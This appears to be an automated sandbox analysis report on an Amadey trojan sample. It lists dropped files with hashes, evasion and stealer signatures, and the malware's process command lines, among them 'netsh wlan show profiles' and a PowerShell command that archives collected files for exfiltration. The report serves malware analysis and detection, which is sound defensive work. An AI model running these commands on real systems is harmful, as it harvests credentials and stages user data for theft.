memory/4640-81-0x0000000072720000-0x0000000072ED0000-memory.dmp

memory/4640-82-0x0000000005250000-0x0000000005260000-memory.dmp

C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe

MD5 0c582da789c91878ab2f1b12d7461496
SHA1 238bd2408f484dd13113889792d6e46d6b41c5ba
SHA256 a6ab532816fbb0c9664c708746db35287aaa85cbb417bef2eafcd9f5eaf7cf67
SHA512 a1b7c5c13462a7704ea2aea5025d1cb16ddd622fe1e2de3bbe08337c271a4dc8b9be2eae58a4896a7df3ad44823675384dbc60bdc737c54b173909be7a0a086a

C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe

MD5 b22521fb370921bb5d69bf8deecce59e
SHA1 3d4486b206e8aaac14a3cf201c5ac152a2a7d4ea
SHA256 b30d10e292f89f4d288839974f71f6b703d6d9a9ae698ea172a2b64364e77158
SHA512 1f7d64ba5266314ed18f577f0984706c21f4f48e8cdb069130e4435c2bcdf219f8dd27e4d3bf3a373f4db4c01e30efe8d7f4d87f4d8cbbbeaf9c7043f685994c

memory/2452-112-0x00000000009A0000-0x0000000000E62000-memory.dmp

memory/1572-113-0x0000000000360000-0x00000000003B2000-memory.dmp

memory/1572-114-0x0000000072720000-0x0000000072ED0000-memory.dmp

C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe

MD5 20ae0bb07ba77cb3748aa63b6eb51afb
SHA1 87c468dc8f3d90a63833d36e4c900fa88d505c6d
SHA256 daf6ae706fc78595f0d386817a0f8a3a7eb4ec8613219382b1cbaa7089418e7d
SHA512 db315e00ce2b2d5a05cb69541ee45aade4332e424c4955a79d2b7261ab7bd739f02dc688224f031a7a030c92fa915d029538e236dbd3c28b8d07d1265a52e5b2

memory/2212-107-0x00000000009B0000-0x0000000000C68000-memory.dmp

memory/1572-120-0x00000000051A0000-0x0000000005744000-memory.dmp

memory/1572-121-0x0000000004C90000-0x0000000004D22000-memory.dmp

memory/4244-124-0x0000000000DC0000-0x0000000000E34000-memory.dmp

memory/2452-126-0x00000000009A0000-0x0000000000E62000-memory.dmp

memory/1572-127-0x0000000004C80000-0x0000000004C8A000-memory.dmp

memory/2448-125-0x0000000000400000-0x000000000044E000-memory.dmp

memory/1572-129-0x0000000004DF0000-0x0000000004E00000-memory.dmp

memory/2448-130-0x0000000000400000-0x000000000044E000-memory.dmp

memory/2448-131-0x0000000000400000-0x000000000044E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\TmpF695.tmp

MD5 1420d30f964eac2c85b2ccfe968eebce
SHA1 bdf9a6876578a3e38079c4f8cf5d6c79687ad750
SHA256 f3327793e3fd1f3f9a93f58d033ed89ce832443e2695beca9f2b04adba049ed9
SHA512 6fcb6ce148e1e246d6805502d4914595957061946751656567a5013d96033dd1769a22a87c45821e7542cde533450e41182cee898cd2ccf911c91bc4822371a8

memory/1572-148-0x00000000058D0000-0x0000000005946000-memory.dmp

memory/1572-151-0x00000000061B0000-0x00000000061CE000-memory.dmp

memory/2540-152-0x00007FFB25470000-0x00007FFB25F31000-memory.dmp

memory/4008-153-0x0000000000900000-0x0000000000901000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe

MD5 0099a99f5ffb3c3ae78af0084136fab3
SHA1 0205a065728a9ec1133e8a372b1e3864df776e8c
SHA256 919ae827ff59fcbe3dbaea9e62855a4d27690818189f696cfb5916a88c823226
SHA512 5ac4f3265c7dd7d172284fb28c94f8fc6428c27853e70989f4ec4208f9897be91720e8eee1906d8e843ab05798f3279a12492a32e8a118f5621ac5e1be2031b6

memory/1572-167-0x0000000006480000-0x000000000658A000-memory.dmp

memory/1572-157-0x0000000006930000-0x0000000006F48000-memory.dmp

memory/1572-168-0x00000000063C0000-0x00000000063D2000-memory.dmp

memory/2540-154-0x000000001BB30000-0x000000001BB40000-memory.dmp

memory/2540-150-0x0000000000DA0000-0x0000000000E60000-memory.dmp

memory/1572-171-0x0000000006420000-0x000000000645C000-memory.dmp

memory/1572-175-0x0000000006590000-0x00000000065DC000-memory.dmp

memory/4244-178-0x0000000000DC0000-0x0000000000E34000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000152001\jok.exe

MD5 8510bcf5bc264c70180abe78298e4d5b
SHA1 2c3a2a85d129b0d750ed146d1d4e4d6274623e28
SHA256 096220045877e456edfea1adcd5bf1efd332665ef073c6d1e9474c84ca5433f6
SHA512 5ff0a47f9e14e22fc76d41910b2986605376605913173d8ad83d29d85eb79b679459e2723a6ad17bc3c3b8c9b359e2be7348ee1c21fa2e8ceb7cc9220515258d

memory/3488-198-0x0000000072720000-0x0000000072ED0000-memory.dmp

memory/3488-199-0x00000000002A0000-0x00000000002F2000-memory.dmp

memory/4640-200-0x0000000072720000-0x0000000072ED0000-memory.dmp

memory/3488-201-0x0000000004DF0000-0x0000000004E00000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-259785868-298165991-4178590326-1000\76b53b3ec448f7ccdda2063b15d2bfc3_1037f2ac-7687-4b04-90ea-cc9b87b0e187

MD5 096ac79e26390f7b80586c12d3033ad8
SHA1 177a47eee8b9e6c6cd8fd44dc81dae9abb3e154c
SHA256 7cdae4646dc40be7c2dfc819357091ab9e182f302a5fd53e06336a53b4fb18c4
SHA512 d513265074d510801cecc3bf5c12034bfa8270fb3b033bb1ebe08c4d521aae062b45524535158d071cca2a70ea36f2574ef6c50d94753244719eb47b92ca9129

C:\Users\Admin\AppData\Local\Temp\1000226001\Uni400uni.exe

MD5 8026082d59bac905bcc4098c69b98743
SHA1 5c8bffce653aa3b6c3e14d5f02927648b5ca8768
SHA256 f6bfa172fb2a124980f8134f6b5c765e7af52133a0c828e87d05b40a1a3f5005
SHA512 304339d26694f1225a23014862676f759c9332ea43ab53c9cb665346228dbed5ece4dca5e41b4d577fdf18ea70f7c61cda852e5122a7fbcf3bdfec5acc0f9f42

C:\Users\Admin\Desktop\Microsoft Edge.lnk

MD5 0dde61b35a32474b60b36f3029816036
SHA1 b9d8f7a29ea49f8e0888ce3213ff89e0c6846b3b
SHA256 61ca23c4b00c8dc112bdd10082637ce9d5b97cb4540de45733ad3ab70110dc25
SHA512 87bbc0e9dc4dc4f5e1cdf7509df7471980e78263380b41d87a2625996ffaf2d1be3ba5c8fe5d78fa689c8ec34e8f9eb51628e95ab8c5b58e8bd8fe4a235b445e

C:\Users\Public\Desktop\Google Chrome.lnk

MD5 1e68832793d8d777910c2d3e30804bb3
SHA1 a6fc19ac7bd5c9283d4a8b324babec28278a738a
SHA256 a1e76542c19dab576a4ae9e1411567710618a7a9a749eec2646ebb0cd42dd36f
SHA512 8a2b12bcba75279fab4675fd1a1da5a6b0b1145eca1bd9536e920a2e9e92f6f6bcfded536ceaa1de54d9f31dce20f4695e5633c0344bb6e0e12d9fbd1724f9aa

memory/4780-244-0x0000021E06E30000-0x0000021E06E40000-memory.dmp

memory/4780-243-0x00007FFB25470000-0x00007FFB25F31000-memory.dmp

memory/4780-242-0x0000021E05060000-0x0000021E050CE000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000153001\swiiii.exe

MD5 586f7fecacd49adab650fae36e2db994
SHA1 35d9fb512a8161ce867812633f0a43b042f9a5e6
SHA256 cf88d499c83da613ad5ccd8805822901bdc3a12eb9b15804aeff8c53dc05fc4e
SHA512 a44a2c99d18509681505cf70a251baf2558030a8648d9c621acc72fafcb2f744e3ef664dfd0229baf7c78fb72e69f5d644c755ded4060dcafa7f711d70e94772

memory/4640-254-0x0000000005250000-0x0000000005260000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000227001\cap.exe

MD5 22e35bea6a2653c8393db13a83b0cf97
SHA1 31adf1873277d5c64f1533a257de3f4fd67d6ad8
SHA256 2e8af331adb9cd46185ae5f7982157267ef3c6e4ccdd943226ee5aec8455fae8
SHA512 666fd393f101f25855a63e75b023bff28c91bde2490c7bb83925049f6aa07519b2814659974dca642446afcfd80216dd36062dc270e2377989c56580e67680fb

memory/4780-273-0x0000021E06DA0000-0x0000021E06DFE000-memory.dmp

memory/2452-285-0x00000000009A0000-0x0000000000E62000-memory.dmp

memory/2696-300-0x0000000000400000-0x000000000063B000-memory.dmp

memory/2696-312-0x0000000000400000-0x000000000063B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000181001\file300un.exe

MD5 7fabf15848c951f6665ec449c8c77098
SHA1 f9ef6114a8e2d3838d0cadd4a71d6baf95e133cf
SHA256 a440e88b2c1d1746b82ffaadaef0571a14f3d76dbabba87b0c3de6ac5eff2f35
SHA512 4e8b84b13bf04befb12d2f1b2f36a1a7285be640315c1a8eb61137f77ca2202b62892d95fee02debaa75ca3b5d782a5d0a7a08a010206929187504a91e9ddb0a

memory/3552-326-0x0000000000400000-0x0000000000408000-memory.dmp

C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\cred64.dll

MD5 f35b671fda2603ec30ace10946f11a90
SHA1 059ad6b06559d4db581b1879e709f32f80850872
SHA256 83e3df5bec15d5333935bea8b719a6d677e2fb3dc1cf9e18e7b82fd0438285c7
SHA512 b5fa27d08c64727cef7fdda5e68054a4359cd697df50d70d1d90da583195959a139066a6214531bbc5f20cd4f9bc1ca3e4244396547381291a6a1d2df9cf8705

C:\Users\Admin\AppData\Local\Temp\1000208001\install.exe

MD5 6184676075afacb9103ae8cbf542c1ed
SHA1 bc757642ad2fcfd6d1da79c0754323cdc823a937
SHA256 a0b0b39b69005a2d39a8b8271a3518aa0a55148b794d2b4995b3c87ed183b23b
SHA512 861ac361b585a069f2274b577b30f2a13baf72a60acd4f22da41885aee92c3975445150822f1072590d7b574ff54eb3abde6a6c4f800988ab9ff4344884f41fa

memory/2696-400-0x0000000061E00000-0x0000000061EF3000-memory.dmp

memory/5252-407-0x0000000000400000-0x0000000000408000-memory.dmp

C:\Users\Admin\Pictures\lUuhMnQQ7PvdGMiY8iAqBpGd.exe

MD5 1a19ffbfd4b258f3295225a719a6def3
SHA1 89d6619748cb194f90b4d9de22d6b0902ea5e53d
SHA256 6c0b05385203fb63728f914f6f19f9255a1060560c5e32787cd723d3fa509017
SHA512 f312535378d1e7bcc2e3385e7db4840593f5c1c726d3b0fff0201ae9cf18bd3ceef52ad2ba0cdb4b717c472ea687c5338e1c4dd4affe4f04fc49bec9eafb8e43

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_x23rf4yt.q0l.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\Pictures\Z0EBvpQRSMUhJkCc88l2wwXz.exe

MD5 5b423612b36cde7f2745455c5dd82577
SHA1 0187c7c80743b44e9e0c193e993294e3b969cc3d
SHA256 e0840d2ea74a00dcc545d770b91d9d889e5a82c7bedf1b989e0a89db04685b09
SHA512 c26a1e7e96dbd178d961c630abd8e564ef69532f386fb198eb20119a88ecab2fe885d71ac0c90687c18910ce00c445f352a5e8fbf5328f3403964f7c7802414c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 dc629a750e345390344524fe0ea7dcd7
SHA1 5f9f00a358caaef0321707c4f6f38d52bd7e0399
SHA256 38b634f3fedcf2a9dc3280aa76bd1ea93e192200b8a48904664fac5c9944636a
SHA512 2a941fe90b748d0326e011258fa9b494dc2f47ac047767455ed16a41d523f04370f818316503a5bad0ff5c5699e92a0aaf3952748b09287c5328354bfa6cc902

C:\Users\Admin\Pictures\Tq7u51xB7kGO6x2EiTsCQngJ.exe

MD5 da2364d9a5527871786e8fee7de6597a
SHA1 4568dc18cebc324ab03056cb7bd86a4ec74f3d21
SHA256 002c12c6c73113e530eb4a14c870d25bc6df6247f0eabdba03dc3b385ff7a7e4
SHA512 e92c0c8b811e0101697398ff7b4e07e6fe7b632e06c95c2dc8843f45705ac40e958fff383f9a9df4e576d37a72fa335ecf2ebea80e7bd0060affca60023515d2

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 af4c2d1afc38e99c46762c67c1904e69
SHA1 24a07aced42ee1082f534e136e050d9214dab708
SHA256 9aa5dd97806442da05a65f89b98c25262f91164c8a77f415420a728d50884278
SHA512 f6f6bfd4e22f539ff343e5886f4e2c7c84562e6e707d21f9696f97438ed0cfa65625c5e01d64e5e314a16bf8cffbcfea93a6393aed3ae011433c702e0a7cd8ca

\??\pipe\crashpad_4244_COPPIHVIXJMVWKML

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk

MD5 9896b3c80a901e8cb4a3120ac639b065
SHA1 041084f5ea27eb476c1df089d0b6e86214642f99
SHA256 d433ae4c29543db91e907dbef9bfa926ff154da46fe9ac55300891db03a4ea73
SHA512 49b9f0852baf9056faad2397511f470aaaa8d33510ebc2f7a61b5359c110f24eef84f2f57f0516b06249b7d7f5c5dd421a09b5135f14cabf2406becb67319fd3

C:\Users\Admin\AppData\Local\Temp\Extension\js\content.js

MD5 9ab0f9320495b406fddb6de1730652cc
SHA1 a6d35a74dc53289794c9a05dc1ad8c03878e153a
SHA256 ab913781705a8841f3c3973af4cfeb14c7ed9919a08ff810b920dca17d69cbd1
SHA512 c527057c8af9cb4a55a71ff5a8010706119fd19b5c354dae046cd498f350c422b10578a3e3c2423e385c81d76d3ece3b057c5f02f8c7b76769e18c5e2aa023fe

C:\Users\Admin\AppData\Local\Temp\Extension\manifest.json

MD5 9358845d5150234f2c91c6c9b8f73ede
SHA1 bcc689cb7b97b8f726c966706e1c39e90194744a
SHA256 30c327ec2dab6b33eaac97c17c036f199c986f949d75fe56c87fe84ebc965b60
SHA512 fa6b069f29e176cfb7dd036b38bddf09c3114b85ad3b41d29f1195ef4196c8d80374abbf636411447d76b65312c72c625af3f9463d9342ab07710fd2b4a19d5c

C:\Users\Admin\AppData\Local\Temp\Extension\background.js

MD5 d8f0b154a3dda574d039f01b2e0b1c96
SHA1 2bd3059ec526d17dc35f40608ad543af31c07608
SHA256 75b3e40f14cdc4b11837fb76516f9475fd72802081b81069c036894af2f8ad42
SHA512 926c7a0e540c08c2ae15de4192fa72faa31bb9cf0d8efe9a77d9ed11f1768ee55900a8bcaa7786f0865a082fdb88d5bfd43356d0b141fcc108d67442c2b2c6fb

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 cff358b013d6f9f633bc1587f6f54ffa
SHA1 6cb7852e096be24695ff1bc213abde42d35bb376
SHA256 39205cdf989e3a86822b3f473c5fc223d7290b98c2a3fb7f75e366fc8e3ecbe9
SHA512 8831c223a1f0cf5f71fa851cdd82f4a9f03e5f267513e05b936756c116997f749ffa563623b4724de921d049de34a8f277cc539f58997cda4d178ea205be2259

C:\Users\Admin\Pictures\WUjqLI0y9xE0qFjc74GfaVjZ.exe

MD5 806f295ff14699677790ca246cb69864
SHA1 5ff2e05176ea77a6a12ed50ac8836757dd342829
SHA256 8f1fb3595585747a418c6fc186c36e3c0a98d80cc81c5df56e8faeb5b2421fb6
SHA512 ecb12e1d799c107f39b998851938b428b1d81906615505aff3ab8426bba06d9d827e29405d8de26761341e57ef38c059d6ec68309df938326771c11dde7175a8

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\69975b31-9472-4ca2-b116-8cec87af925a.tmp

MD5 46605f270b7081f67a4146c2b814cbb9
SHA1 5a9e1913e474bfe3eaf1a882dfc68386aba988df
SHA256 0d44a6c87fd4affc079853edc6d8076e141664d1d7c52180d5c36eb7c060607d
SHA512 8b7005c9b6cb700f548f378bed81e62ddb9f48b40e27d68135f79dd8525407dc8b2e7e5d1bebb2e6634dfedff13ae681056888f9751f60f9fdd6ec6e9ea8d6a6

C:\Users\Admin\Pictures\JxSE1viobyTMzUdd6pr1jYEY.exe

MD5 6c9e50ff4e2e2bf25f13dae3d06d42cd
SHA1 65d000cdcb33e83feb75f9652190ec228234e3be
SHA256 666cf81ccff7aeaa177d8c3f8e5c7f8853fe9a0014b247f6f18c848ef1457153
SHA512 705bd35af4203bf5c956cc6bc21ace4612f9691b78ea18981c896804a5c104cf6dcefda3393c94c23b6496a5b3b1c44b38dd4501fc3dfe54a627ba1fe49c3fdb

memory/2452-615-0x00000000009A0000-0x0000000000E62000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

MD5 ec7df4fb57284bab7fdbc3f81330d688
SHA1 fa3aba2725f0b0f23752536a982af5111a7e5acc
SHA256 d7f38b83a6c0033742e6858aff74a649c45c10afa1a5ad1efb9d66b7c84c5822
SHA512 a3e12ca69959b82f984e25d78d9520901fd4ee45f943b2b940a988d43e1e36d13f549ca274abe01e6eb68756abaf5f06ec18ea67cded8cb7d0866bbdfb2a9c09

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Windows\System32\GroupPolicy\gpt.ini

MD5 8ef9853d1881c5fe4d681bfb31282a01
SHA1 a05609065520e4b4e553784c566430ad9736f19f
SHA256 9228f13d82c3dc96b957769f6081e5bac53cffca4ffde0ba1e102d9968f184a2
SHA512 5ddee931a08cfea5bb9d1c36355d47155a24d617c2a11d08364ffc54e593064011dee4fea8ac5b67029cab515d3071f0ba0422bb76af492a3115272ba8feb005

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

MD5 d751713988987e9331980363e24189ce
SHA1 97d170e1550eee4afc0af065b78cda302a97674c
SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512 b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\clip64.dll

MD5 154c3f1334dd435f562672f2664fea6b
SHA1 51dd25e2ba98b8546de163b8f26e2972a90c2c79
SHA256 5f431129f97f3d56929f1e5584819e091bd6c854d7e18503074737fc6d79e33f
SHA512 1bca69bbcdb7ecd418769e9d4befc458f9f8e3cee81feb7316bb61e189e2904f4431e4cc7d291e179a5dec441b959d428d8e433f579036f763bbad6460222841

C:\Program Files (x86)\GameServerClient\installg.bat

MD5 b6b57c523f3733580d973f0f79d5c609
SHA1 2cc30cfd66817274c84f71d46f60d9e578b7bf95
SHA256 d8d718641bdf39cca1a5db7bb52d3c66d400a97bef3cafdd81cd7e711a51c570
SHA512 d39440163592bc3b1cb7830f236a97d5819c10775e453637d5a04a981e9a336480c6b4701afdceba0d52dfe09413b7abe2ad58ff55b5057a26229f3ccdc3a7c7

C:\Users\Admin\Pictures\qOUAgB63FuuHS2R8dK3BVAuF.exe

MD5 69f6614893028c60394f744c7ebc1551
SHA1 ccd4a9f86876ddbfe2bc86a2b17a4cbc1857b1dd
SHA256 b96a4de2d4f97380388b6b515e8cdef28a92f358a7d487be3463828303d8661d
SHA512 4a40bcf25303accf93bb15e281a53ee0cda93c1f7c1ede741338b8080daa0a61c6751c5d11ed8ceeec520782913f748298b5016565a31f47c980d8e868461855

C:\Users\Admin\Pictures\dwH8FokgOu20Z9ZQ360ELUmq.exe

MD5 62055f93af6be4703f3c43e3e03c3dfb
SHA1 2d0be89e8d2e83a645f8b8edf4e6475e66ed6a8b
SHA256 03e12ecf1310d2afdfdb50a3478eee9eba7dc3123035037022d1ce794ec5dd1a
SHA512 dda55ab5331fa12b1269e71f82165a6b497882815c71641fb694e9e8611dc2412c810b79008282bcf105bb928543b565c9c319bdadfec1eeb54e7d037570f9e6

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 d8834ce94825e397a4988b544f996de6
SHA1 94879a7c24518c57380e012ab31740fce945afd1
SHA256 a219ee0844bff4d2cd6d369c3393eef10cc52c6505e783175b42cdca22c9efb4
SHA512 0fb95eafbdd807b801c9ae04b635e7cb73fbfd9852d8f0496c7d73cf6a0e6489d8ae6df4c2187364077b2624a376143b9f122b992511396e0695ee4b557351ed

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 8c03e331e18a0d1af6a9ed0d0e2eabbf
SHA1 7aca5f1c04bcd02e07fa4a694e4c081f9ac9a555
SHA256 3c0bd46c8a868f6144f833b973137e1303138e902ae5a827f52f8c8a2374fd5f
SHA512 5682d6084f845e63f2783d544b1081560928221aa436acc4cc221bee6828c3c228fe450c0adac3d5d1a235864a14ce07b2d33fb2b4d57bf83a8c7ea9abec6ef5

memory/5548-703-0x0000000000400000-0x0000000002C46000-memory.dmp

C:\Windows\System32\GroupPolicy\gpt.ini

MD5 7cc972a3480ca0a4792dc3379a763572
SHA1 f72eb4124d24f06678052706c542340422307317
SHA256 02ad5d151250848f2cc4b650a351505aa58ac13c50da207cc06295c123ddf5e5

Analysis: behavioral2

Detonation Overview

Submitted

2024-04-25 17:25

Reported

2024-04-25 17:27

Platform

win11-20240412-en

Max time kernel

145s

Max time network

152s

Command Line

"C:\Users\Admin\AppData\Local\Temp\217534469e02f0637a69df31094188ed270d523f9259140b2cfaa3c74ff87854.exe"

Signatures

Amadey

trojan amadey

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\217534469e02f0637a69df31094188ed270d523f9259140b2cfaa3c74ff87854.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Downloads MZ/PE file

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\217534469e02f0637a69df31094188ed270d523f9259140b2cfaa3c74ff87854.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\217534469e02f0637a69df31094188ed270d523f9259140b2cfaa3c74ff87854.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe N/A

Identifies Wine through registry keys

evasion

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3777591257-2471171023-3629228286-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\217534469e02f0637a69df31094188ed270d523f9259140b2cfaa3c74ff87854.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3777591257-2471171023-3629228286-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Reads WinSCP keys stored on the system

spyware stealer

Reads local data of messenger clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\217534469e02f0637a69df31094188ed270d523f9259140b2cfaa3c74ff87854.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\chrosha.job C:\Users\Admin\AppData\Local\Temp\217534469e02f0637a69df31094188ed270d523f9259140b2cfaa3c74ff87854.exe N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\217534469e02f0637a69df31094188ed270d523f9259140b2cfaa3c74ff87854.exe

"C:\Users\Admin\AppData\Local\Temp\217534469e02f0637a69df31094188ed270d523f9259140b2cfaa3c74ff87854.exe"

C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe

C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main

C:\Windows\system32\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main

C:\Windows\system32\netsh.exe

netsh wlan show profiles

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\777591257247_Desktop.zip' -CompressionLevel Optimal

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main

Network

Country Destination Domain Proto
US 8.8.8.8:53 133.190.18.2.in-addr.arpa udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
RU 193.233.132.167:80 193.233.132.167 tcp
RU 193.233.132.167:80 193.233.132.167 tcp
RU 193.233.132.167:80 193.233.132.167 tcp

Files
